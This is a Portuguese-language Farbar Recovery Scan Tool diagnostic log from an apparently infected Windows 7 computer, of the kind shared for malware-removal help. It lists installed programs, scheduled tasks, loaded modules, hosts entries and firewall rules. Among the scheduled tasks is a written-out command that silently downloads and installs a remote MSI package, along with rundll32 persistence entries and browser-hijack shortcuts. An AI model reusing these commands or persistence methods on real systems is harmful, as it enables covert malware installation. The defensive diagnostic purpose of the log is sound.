Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 15-03-2017 Executado por Renato (21-03-2017 15:09:01) Executando a partir de C:\Users\Renato\Downloads Windows 7 Ultimate (X64) (2015-06-24 16:44:23) Modo da Inicialização: Normal ========================================================== ==================== Contas: ============================= Administrador (S-1-5-21-3989744648-3571885242-2210684081-500 - Administrator - Disabled) Convidado (S-1-5-21-3989744648-3571885242-2210684081-501 - Limited - Enabled) Renato (S-1-5-21-3989744648-3571885242-2210684081-1000 - Administrator - Enabled) => C:\Users\Renato ==================== Central de Segurança ======================== (Se uma entrada for incluída na fixlist, será removida.) AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Programas Instalados ====================== (Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.) 64 Bit HP CIO Components Installer (Version: 18.2.4 - Hewlett-Packard) Hidden Adobe Flash Player 25 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 25.0.0.127 - Adobe Systems Incorporated) Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated) Adobe Reader 9.3 - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-A93000000001}) (Version: 9.3.0 - Adobe Systems Incorporated) CCleaner (HKLM\...\CCleaner) (Version: 5.28 - Piriform) Corel Graphics - Windows Shell Extension (HKLM-x32\...\_{761B6C00-A23A-4F17-9D23-CB7E48307314}) (Version: 16.1.0.843 - Corel Corporation) Corel Graphics - Windows Shell Extension (x32 Version: 16.1.843 - Corel Corporation) Hidden Corel Graphics - Windows Shell Extension 64 Bit (Version: 16.1.843 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Windows Shell Extension 64 Bit (Version: 15.0.487 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - BR (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - Capture (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - Common (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - Connect (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - Custom Data (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - Draw (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - Filters (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - FontNav (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - IPM (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - PHOTO-PAINT (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - Photozoom Plugin (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - Redist (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - Setup Files (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - VBA (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - VideoBrowser (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - VSTA (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 - Writing Tools (x32 Version: 16.1 - Corel Corporation) Hidden CorelDRAW Graphics Suite X6 (HKLM-x32\...\_{511DE7EA-AA68-4D7A-A2E3-0E7B5186B822}) (Version: 16.1.0.843 - Corel Corporation) CorelDRAW Graphics Suite X6 (x32 Version: 16.1 - Corel Corporation) Hidden D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Galeria de Fotos (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.) Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google) Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden HPSSupply (x32 Version: 140.0.212.0 - Hewlett-Packard) Hidden Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3412 - Intel Corporation) Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation) Jogotempo version 5.0 (HKLM-x32\...\{B552B283-6EBC-457E-8187-01682C83F26C}_is1) (Version: 5.0 - ) <==== ATENÇÃO Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Kyocera Product Library (HKLM\...\Kyocera Product Library) (Version: 2.0.713 - Kyocera Mita Corporation) KYOCERA Status Monitor 4 (HKLM\...\{24EE7F6D-C648-463f-9E71-DC5FD2258D16}) (Version: 4.1.3407 - KYOCERA Document Solutions Inc.) Kyocera TWAIN Driver (HKLM-x32\...\InstallShield_{249E5A9C-3F72-49B1-B222-FEF550315CC5}) (Version: 1.7.0615 - Kyocera Mita) Kyocera TWAIN Driver (x32 Version: 1.7.0615 - Kyocera Mita) Hidden Kyocera TWAIN Driver (x32 Version: 2.0.1514 - KYOCERA Document Solutions Inc.) Hidden Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation) Microsoft Office Outlook Connector (HKLM-x32\...\{95140000-007A-0416-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation) Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-3989744648-3571885242-2210684081-1000\...\OneDriveSetup.exe) (Version: 17.0.4035.0328 - Microsoft Corporation) Microsoft Outlook Social Connector Provider for Windows Live Messenger 32-bit (HKLM-x32\...\{95140000-007D-0409-0000-0000000FF1CE}) (Version: 14.0.5120.5000 - Microsoft Corporation) Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM-x32\...\{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual Studio Tools for Applications 2.0 Runtime (HKLM-x32\...\{299C0434-4F4E-341F-A916-4E07AEB35E79}) (Version: 9.0.30729 - Microsoft Corporation) Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Mozilla Firefox 52.0.1 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 52.0.1 (x86 pt-BR)) (Version: 52.0.1 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0.1.6284 - Mozilla) Pacote de Idiomas do Microsoft .NET Framework 4 Client Profile - Português (Brasil) (HKLM\...\Microsoft .NET Framework 4 Client Profile PTB Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Pacote de Idiomas do Microsoft .NET Framework 4 Extended - Português (Brasil) (HKLM\...\Microsoft .NET Framework 4 Extended PTB Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Realtek Card Reader (HKLM-x32\...\{F0A8BF4A-972F-41E0-9800-1EFE3BF28266}) (Version: 6.2.9200.30158 - Realtek Semiconductor Corp.) Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 7.67.1226.2012 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6196 - Realtek Semiconductor Corp.) ScanSoft PaperPort 11 (HKLM-x32\...\{C0E5B596-4F4F-4A45-A679-153693101050}) (Version: 11.1.0.307 - Nuance Communications, Inc.) Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP) Software de dispositivo do Chipset Intel® (x32 Version: 10.0.13 - Intel(R) Corporation) Hidden TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.72365 - TeamViewer) USB Enhanced Performance Keyboard (HKLM\...\{989DC5D9-A776-430D-9E16-D36E5B81CD86}) (Version: 2.0.2.2 - Lenovo) Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation) WinRAR 4.20 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH) ==================== Exame Personalizado CLSID (Whitelisted): ========================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) CustomCLSID: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000_Classes\CLSID\{0783EB25-59F8-4F02-B6B0-F1D4349F0007}\InprocServer32 -> C:\Users\Renato\AppData\Local\GAS Tecnologia\GBBD\npsf_cef_64.dll (GAS Tecnologia) CustomCLSID: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000_Classes\CLSID\{0783EB25-59F8-4F02-B6B1-F1D4349F0007}\InprocServer32 -> C:\Users\Renato\AppData\Local\GAS Tecnologia\GBBD\npsf_cef_64.dll (GAS Tecnologia) CustomCLSID: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Renato\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Renato\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Renato\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Renato\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Renato\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\FileSyncApi64.dll (Microsoft Corporation) ==================== Tarefas Agendadas (Whitelisted) ============= (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) Task: {1CEE2198-8667-49BC-AF1F-356E98922469} - System32\Tasks\KuaiZip_Update => C:\Program Files\¿ìѹ\X86\Update.exe [2017-03-21] (Shanghai Guangle Network Technology Ltd ) <==== ATENÇÃO Task: {32999B49-7909-48C0-946D-61737F132B2B} - System32\Tasks\47o751o563t157 => Rundll32.exe "C:\ProgramData\47o751o563t157\47o751o563t157.dll",otWPQTje <==== ATENÇÃO Task: {34C3E152-3778-4D63-B299-912667BA867B} - System32\Tasks\Stukatprjertion Update => C:\Program Files (x86)\Vehotherdreguty\xnmush.exe [2017-03-21] (Glarysoft Ltd) Task: {53952A1E-B8FE-4821-8642-0B7FDD59C9BA} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-03-14] (Adobe Systems Incorporated) Task: {562D57D8-E524-498A-A3F5-24DF8C8932F2} - System32\Tasks\Motupyanegcult Cache => C:\Program Files (x86)\Qejisyfank\xdrijot.exe [2017-03-21] (Glarysoft Ltd) Task: {6007D9C6-4BDD-4D2C-9DD6-4F10C0E83CD3} - System32\Tasks\{CA5F38A2-BA0E-42A7-852A-90DC65B25F7C} => pcalua.exe -a "C:\Program Files\7LTGCYUNFZ\uninstaller.exe" -d "C:\Program Files\7LTGCYUNFZ" Task: {7CF49F9B-C8C2-470F-B9E2-64C41094BE12} - System32\Tasks\{5B2EF4D7-B689-467E-B599-43B633463A9A} => pcalua.exe -a E:\autorun.exe -d E:\ Task: {807F7ACB-8E9A-47D6-AB50-352D97313D14} - System32\Tasks\{898BE662-29B0-49C3-949D-73F206BE2086} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Windows Live\.cache\24db3e9b1d0dd1904\onedrivesetup.exe" -d "C:\Program Files (x86)\Common Files\Windows Live\.cache\24db3e9b1d0dd1904" -c C:\Program Files (x86)\Common Files\Windows Live\.cache\24db3e9b1d0dd1904\onedrivesetup.exe /silent /permachine /silent (a entrada de dados tem 69 mais caracteres). Task: {9C5B455B-A6CE-4968-B3D0-455DCEAA9930} - System32\Tasks\{FF08FBC2-6458-4BE0-AFCB-B4D776CF518F} => pcalua.exe -a C:\Users\Renato\Downloads\GBPCEF.exe -d C:\Users\Renato\Downloads -c admin_service Task: {AF153F75-35BB-4236-9FF7-D304D0E69C85} - System32\Tasks\{27CF2902-E889-0B48-0CFD-7205D36734C5} => C:\Users\Renato\AppData\Roaming\wincy\sync.exe Task: {C4157637-0EBB-430C-A68E-D2143F43003D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-06-24] (Google Inc.) Task: {C67EF8BF-598F-4098-BDD9-29361EA6BA9A} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-03-03] (Piriform Ltd) Task: {C9A2F3D8-69BE-4CC2-9925-1F569ECE1E2C} - System32\Tasks\Ckibugh => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD5000AAKX-08U6AA0_WD-WCC2EX78323383233&v=20170321 /q <==== ATENÇÃO Task: {CA8552E2-787F-459F-92BD-37AD073D26D9} - System32\Tasks\osTip => Chrome.exe <==== ATENÇÃO Task: {D34ECB37-68C7-4FF7-AA02-85B72E1D79BC} - System32\Tasks\mG41sVNMLM => C:\Program Files (x86)\jsXuLWuidd\updengine.exe [2017-03-13] () <==== ATENÇÃO Task: {D440D320-D3D3-4ABA-B0EC-501C5ABD76E4} - System32\Tasks\DriverEasy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe Task: {DD1F8A83-35FA-4C2A-96AA-0134DC257A0C} - System32\Tasks\47o751o563t157-dll => Rundll32.exe "C:\ProgramData\47o751o563t157\47o751o563t157.dll",otWPQTje Task: {EA422E2F-0B53-4A7F-A31D-CE23B4239483} - System32\Tasks\Microsoft\Windows\Media Center\RegisterObject => C:\\ProgramData\\RegisterObject\\RegisterObject.exe [2017-03-20] () <==== ATENÇÃO Task: {FCEAFE40-98BF-410E-B09C-72E066A07962} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-06-24] (Google Inc.) (Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.) Task: C:\Windows\Tasks\DriverEasy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe Task: C:\Windows\Tasks\{27CF2902-E889-0B48-0CFD-7205D36734C5}.job => C:\Users\Renato\AppData\Roaming\wincy\sync.exe ==================== Atalhos ============================= (As entradas podem ser listadas para serem restauradas ou removidas.) ShortcutWithArgument: C:\Users\Renato\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic ShortcutWithArgument: C:\Users\Renato\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic ShortcutWithArgument: C:\Users\Renato\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> www.123rede.com?oem=sv1&uid=WD-WCC2EX783233_WDCWD5000AAKX-08U6AA0&tm=1490115698 --disable-quic ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> www.123rede.com?oem=sv1&uid=WD-WCC2EX783233_WDCWD5000AAKX-08U6AA0&tm=1490115698 ==================== Módulos Carregados (Whitelisted) ============== 2015-12-16 11:39 - 2014-06-26 19:10 - 00595456 _____ () C:\Program Files (x86)\DoroPDFWriter\Doro.dll 2017-03-21 14:02 - 2017-03-21 14:02 - 00307712 _____ () C:\Program Files (x86)\Stukatprjertion Update\local64spl.dll 2017-03-21 13:57 - 2017-03-21 13:57 - 01620992 _____ () C:\ProgramData\service.exe 2015-06-24 14:51 - 2015-06-24 14:50 - 00008192 _____ () C:\Windows\SysWOW64\srvany.exe 2015-06-24 14:51 - 2015-06-24 14:50 - 00151552 _____ () C:\Windows\KMService.exe 2017-03-21 13:57 - 2017-03-21 13:57 - 00177152 _____ () C:\Windows\svchost.exe 2017-03-21 13:57 - 2017-03-21 13:57 - 01466213 _____ () C:\Windows\csrss.exe 2017-03-21 13:56 - 2016-11-10 04:19 - 05091840 _____ () C:\Users\Renato\AppData\Roaming\WMPNetworkAcSvc\WMPNetworkAcSvc.exe 2017-03-21 13:57 - 2014-03-22 15:18 - 03100672 _____ () C:\ProgramData\47o751o563t157\47o751o563t157.dll 2017-03-21 14:46 - 2017-03-21 14:46 - 00214016 _____ () C:\Windows\TEMP\g7A8D.tmp.exe 2010-01-30 02:40 - 2010-01-30 02:40 - 04254560 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF 2017-03-21 14:00 - 2017-03-21 14:00 - 00524696 _____ () C:\Program Files\¿ìѹ\X64\KZipShell.dll 2015-06-24 14:01 - 2014-01-23 06:35 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll 2017-03-21 13:57 - 2017-03-21 13:57 - 02072064 _____ () C:\Users\Renato\AppData\Local\Temp\00009360\msiql.exe 2017-03-21 12:56 - 2017-03-21 10:18 - 120090112 _____ () C:\Users\Renato\AppData\Local\LikeToles01a\MCHromptoolz0.exe 2017-03-21 14:47 - 2017-03-21 14:47 - 03531776 _____ () C:\Windows\TEMP\g6106.tmp 2017-03-21 14:00 - 2017-03-21 14:00 - 00219032 _____ () c:\program files\¿ìñ¹\x86\kuaizipupdatechecker.dll 2017-03-13 17:46 - 2017-03-13 17:46 - 01009152 _____ () C:\Program Files (x86)\jsXuLWuidd\kl.dll 2017-03-21 13:56 - 2016-03-06 04:40 - 00083456 _____ () C:\Users\Renato\AppData\Roaming\WMPNetworkAcSvc\Interface.dll 2017-03-21 12:44 - 2017-03-21 12:44 - 02145792 _____ () C:\Users\Renato\AppData\Roaming\c4dRcR\dbghelp.dll - - 00000000 _____ () C:\Users\Renato\AppData\Roaming\c4dRcR\JO5Urp.dll:dGdLpRi8 2017-03-21 14:46 - 2017-03-21 14:46 - 03765248 _____ () C:\Windows\TEMP\g4D73.tmp 2010-01-30 02:41 - 2010-01-30 02:41 - 04254560 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF 2017-02-07 07:58 - 2017-02-01 06:01 - 01870168 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libglesv2.dll 2017-02-07 07:58 - 2017-02-01 06:01 - 00085848 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libegl.dll ==================== Alternate Data Streams (Whitelisted) ========= (Se uma entrada for incluída na fixlist, somente o ADS será removido.) AlternateDataStreams: C:\Windows:nlsPreferences [386] AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10] AlternateDataStreams: C:\Windows\System32:A171AC58_Cef.gbp [2] AlternateDataStreams: C:\Windows\system32\Drivers\wsddfac.sys:X5ZN8aGXs4 [2166] AlternateDataStreams: C:\ProgramData\GbPlugin:IncompleteStartGbprcm.cnt [10] AlternateDataStreams: C:\Users\Todos os Usuários\GbPlugin:IncompleteStartGbprcm.cnt [10] ==================== Modo de Segurança (Whitelisted) =================== (Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.) ==================== Associação (Whitelisted) =============== (Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.) ==================== Internet Explorer confiável/restrito =============== (Se uma entrada for incluída na fixlist, será removida do Registro.) IE trusted site: HKU\.DEFAULT\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br IE trusted site: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br IE trusted site: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000\...\caixa.gov.br -> imagem.caixa.gov.br IE trusted site: HKU\S-1-5-21-3989744648-3571885242-2210684081-1000\...\internet-explorer-config.com -> internet-explorer-config.com ==================== Hosts Conteúdo: ========================== (Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.) 2009-07-13 23:34 - 2017-03-21 14:08 - 00001721 ____A C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 cpm.paneladmin.pro 127.0.0.1 publisher.hmdiadmingate.xyz 127.0.0.1 distribution.hmdiadmingate.xyz 127.0.0.1 hmdicrewtracksystem.xyz 127.0.0.1 linkmate.space 127.0.0.1 space1.adminpressure.space 127.0.0.1 trackpressure.website 127.0.0.1 doctorlink.space 127.0.0.1 beautifllink.xyz 127.0.0.1 cpm.paneladmin.pro 127.0.0.1 publisher.hmdiadmingate.xyz 127.0.0.1 distribution.hmdiadmingate.xyz 127.0.0.1 hmdicrewtracksystem.xyz 127.0.0.1 linkmate.space 127.0.0.1 space1.adminpressure.space 127.0.0.1 trackpressure.website 127.0.0.1 doctorlink.space 127.0.0.1 beautifllink.xyz 127.0.0.1 cpm.paneladmin.pro 127.0.0.1 publisher.hmdiadmingate.xyz 127.0.0.1 distribution.hmdiadmingate.xyz 127.0.0.1 hmdicrewtracksystem.xyz 127.0.0.1 linkmate.space 127.0.0.1 space1.adminpressure.space 127.0.0.1 trackpressure.website 127.0.0.1 doctorlink.space 127.0.0.1 beautifllink.xyz ==================== Outras Áreas ============================ (Atualmente não há nenhuma correção automática para esta seção.) HKU\S-1-5-21-3989744648-3571885242-2210684081-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Renato\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 8.8.8.8 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0) Firewall do Windows está habilitado. ==================== MSCONFIG/TASK MANAGER ítens desabilitados == MSCONFIG\Services: wuauserv => 2 ==================== Regras do Firewall (Whitelisted) =============== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) FirewallRules: [TCP Query User{8E4EC827-FAEE-4F70-BC55-00364973A644}C:\program files (x86)\google\chrome\application\chrome.exe] => (Block) C:\program files (x86)\google\chrome\application\chrome.exe FirewallRules: [UDP Query User{4EA8C53C-27D1-459A-9CDF-B299E14AAAB1}C:\program files (x86)\google\chrome\application\chrome.exe] => (Block) C:\program files (x86)\google\chrome\application\chrome.exe FirewallRules: [{A447CDD5-02A1-44EB-AD74-AF1BB43D59D6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{3438801C-4444-4AA3-84FB-E4B947DBB644}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [TCP Query User{08D4A4D1-B556-4EA2-8212-F60A526FEF83}C:\users\renato\desktop\aa_v3.1.exe] => (Block) C:\users\renato\desktop\aa_v3.1.exe FirewallRules: [UDP Query User{FE5EE235-DD96-4A22-AE50-41D7E712CC36}C:\users\renato\desktop\aa_v3.1.exe] => (Block) C:\users\renato\desktop\aa_v3.1.exe FirewallRules: [{615395E2-8AD0-4B24-9683-7B01DD6BBBBF}] => (Allow) C:\Program Files\Diebold\Warsaw\core.exe FirewallRules: [{1F613E4A-E602-4F8E-9AB9-090A14CBD1EE}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{A6C63288-ABDE-48A1-B3EA-E1578367D8F8}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{1E6BCE3B-2114-4AD2-A2AC-024FB6F44329}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{9ECAD9B8-08D6-4652-8D24-5BA0A1BD0347}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{4A9E189B-4B30-4BC3-B586-8073C1052CB3}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{6CF0F38F-BB8E-446D-BBCD-E374549FB562}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe FirewallRules: [{C0DBD949-7FCC-4D2C-8471-53412ABD40E7}] => (Allow) LPort=2869 FirewallRules: [{11BE0587-ABDF-438E-9458-88EFE09E8670}] => (Allow) LPort=1900 FirewallRules: [{56DBCCE7-8211-4064-9C74-2592D3C47C6C}] => (Allow) C:\ProgramData\Microsoft\Network\Dsq\network\sysnetwk.exe FirewallRules: [{E37700FC-8AD6-4E87-B656-550473F37C5D}] => (Allow) C:\Windows\system32\rundll32.exe FirewallRules: [{1D4F54D9-025D-47B0-A9D0-8BB227567ADF}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{AF1AFE9C-B985-4B23-8C9B-76A503107FE5}] => (Allow) C:\Windows\System32\rundll32.exe ==================== Pontos de Restauração ========================= 13-03-2017 11:00:09 Backup do Windows 20-03-2017 11:00:09 Backup do Windows 21-03-2017 12:45:28 Windows Live Essentials 21-03-2017 12:46:06 DirectX instalado 21-03-2017 12:46:25 DirectX instalado 21-03-2017 13:01:29 Windows Live Essentials 21-03-2017 13:26:22 Windows Live Essentials 21-03-2017 13:30:59 DirectX instalado 21-03-2017 13:31:24 DirectX instalado 21-03-2017 13:31:34 DirectX instalado 21-03-2017 14:22:29 Operação de restauração ==================== Dispositivos Apresentando Falhas No Gerenciador ============= Name: Controlador de comunicação PCI simples Description: Controlador de comunicação PCI simples Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. Name: Teredo Tunneling Pseudo-Interface Description: Adaptador de Túnel Teredo da Microsoft Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: tunnel Problem: : This device cannot start. (Code10) Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device. On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard. Name: Warsaw - Driver (PP) Description: Warsaw - Driver (PP) Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1} Manufacturer: Service: wsddpp Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. ==================== Erros no Log de eventos: ========================= Erros em Aplicativos: ================== Erros de Sistema: ============= CodeIntegrity: =================================== Date: 2017-03-21 14:45:21.271 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\winhttp.dll because the set of per-page image hashes could not be found on the system. Date: 2017-03-21 14:45:21.256 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\winhttp.dll because the set of per-page image hashes could not be found on the system. ==================== Informações da Memória =========================== Processador: Intel(R) Core(TM) i3-3240 CPU @ 3.40GHz Percentagem de memória em uso: 59% RAM física total: 4013.2 MB RAM física disponível: 1633.82 MB Virtual Total: 8024.54 MB Virtual disponível: 5445.75 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:68.26 GB) (Free:32.07 GB) NTFS Drive d: () (Fixed) (Total:397.4 GB) (Free:305.69 GB) NTFS Drive e: (PIGIRS CIDERSP) (CDROM) (Total:0.02 GB) (Free:0 GB) UDF Drive g: (Expansion Drive) (Fixed) (Total:931.51 GB) (Free:562.83 GB) NTFS ==================== MBR & Tabela de Partições ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 49C491A8) 